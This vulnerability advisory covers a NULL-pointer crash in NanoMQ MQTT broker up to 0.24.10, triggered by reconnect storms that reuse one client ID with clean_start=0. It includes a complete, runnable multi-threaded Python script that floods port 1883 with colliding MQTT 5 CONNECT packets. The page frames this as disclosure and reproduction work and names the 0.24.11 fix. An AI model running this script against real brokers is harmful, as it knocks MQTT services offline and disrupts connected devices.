NanoMQ
cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*
- <= 0.24.10
A denial-of-service vulnerability has been identified in NanoMQ MQTT Broker versions through 0.24.10. Under high-concurrency reconnect traffic in which many connections reuse the same client ID (a client-ID collision) with clean_start set to 0, the broker attempts to resume the existing MQTT session for each colliding connection and can crash on a NULL pointer dereference. The transport's p_peer callback iterates over the session's subscription information list without checking for NULL pointers, so a NULL encountered during that iteration takes down the process.
Exploitation of this vulnerability causes the NanoMQ broker process to crash, terminating the MQTT service and disrupting any active connections or message deliveries.
The issue can be reproduced with an AddressSanitizer-instrumented build of NanoMQ, available as release 0.24.10-14, which reports the invalid access explicitly. With the broker running, a multi-threaded Python script sends a CONNECT payload that causes client-ID collisions over TCP to the default MQTT port, 1883, simulating a high-concurrency reconnect storm; this recreates the conditions that trigger the NULL pointer dereference and the crash.
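As an added example (not the reporter's script and not NanoMQ project code), the following Python reproduces the traffic pattern described above: many threads repeatedly connecting to port 1883 with the same client ID and clean_start=0, so each reconnect collides with the live session and forces the broker to resume it. The exact payload used in the original report is not on this page; this script only encodes a standard MQTT 5 CONNECT packet (with a Session Expiry Interval so the broker keeps the session between connections). The host, port, client ID and thread/round counts are placeholders. Run it only against a broker you operate, since a vulnerable version will crash.

```python
"""Reconnect-storm generator for testing MQTT session-resumption handling.

Added example, not from the original report or the NanoMQ project.
Target host/port, client ID and thread counts are placeholders.
"""
import socket
import struct
import threading

PROTOCOL_LEVEL_V5 = 5
PROP_SESSION_EXPIRY_INTERVAL = 0x11  # MQTT 5 property identifier
CONNECT_PACKET_TYPE = 0x10           # fixed header byte: type 1, flags 0


def encode_varint(n: int) -> bytes:
    """Encode an MQTT Variable Byte Integer (1..4 bytes, 7 data bits each)."""
    if not 0 <= n <= 268_435_455:
        raise ValueError("variable byte integer out of range")
    out = bytearray()
    while True:
        byte = n % 128
        n //= 128
        if n:
            byte |= 0x80  # continuation bit
        out.append(byte)
        if not n:
            return bytes(out)


def encode_utf8(s: str) -> bytes:
    """Encode an MQTT UTF-8 string: 2-byte big-endian length, then the bytes."""
    data = s.encode("utf-8")
    if len(data) > 0xFFFF:
        raise ValueError("string too long for MQTT UTF-8 string")
    return struct.pack("!H", len(data)) + data


def build_connect(client_id: str, clean_start: bool = False,
                  keep_alive: int = 60, session_expiry: int = 0xFFFFFFFF) -> bytes:
    """Build an MQTT 5 CONNECT packet.

    clean_start=False leaves the Clean Start bit clear, asking the broker to
    resume the session stored for client_id. A non-zero Session Expiry
    Interval makes the broker keep that session after a disconnect, which is
    what the next reconnect with the same client_id then collides with.
    """
    flags = 0x02 if clean_start else 0x00  # bit 1 = Clean Start; no will/user/pass
    props = bytes([PROP_SESSION_EXPIRY_INTERVAL]) + struct.pack("!I", session_expiry)
    variable_header = (
        encode_utf8("MQTT")
        + bytes([PROTOCOL_LEVEL_V5, flags])
        + struct.pack("!H", keep_alive)
        + encode_varint(len(props)) + props
    )
    payload = encode_utf8(client_id)  # only the Client Identifier, no will
    body = variable_header + payload
    return bytes([CONNECT_PACKET_TYPE]) + encode_varint(len(body)) + body


def reconnect_storm(host: str, port: int, client_id: str,
                    threads: int = 50, rounds: int = 20, timeout: float = 2.0) -> dict:
    """Hammer the broker with colliding resumptions of one client_id.

    Every thread repeatedly opens a TCP connection, sends the same CONNECT
    (clean_start=0) and drops the socket, so the broker keeps taking over and
    resuming one session from many connections at once. Returns counters; a
    broker that dies mid-run shows up as errors on the remaining rounds.
    """
    packet = build_connect(client_id, clean_start=False)
    stats = {"attempts": 0, "connack": 0, "errors": 0}
    lock = threading.Lock()

    def worker():
        for _ in range(rounds):
            with lock:
                stats["attempts"] += 1
            try:
                with socket.create_connection((host, port), timeout=timeout) as s:
                    s.sendall(packet)
                    reply = s.recv(64)  # CONNACK starts with 0x20; b"" means EOF
                    if reply[:1] == b"\x20":
                        with lock:
                            stats["connack"] += 1
            except OSError:
                with lock:
                    stats["errors"] += 1

    workers = [threading.Thread(target=worker) for _ in range(threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    return stats


if __name__ == "__main__":
    # Placeholder target: a NanoMQ instance you operate, on the default port.
    print(reconnect_storm("127.0.0.1", 1883, "collide-me", threads=50, rounds=20))
```

With an ASan build, the first resumption that hits the missing NULL check prints a SEGV report on the broker side and the script's error counter climbs for every round after that, since the listener is gone; against a patched 0.24.11 broker the run completes with only CONNACKs.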
Users can upgrade to NanoMQ version 0.24.11, which addresses the vulnerability by adding the necessary NULL checks in the transport peer callback functions.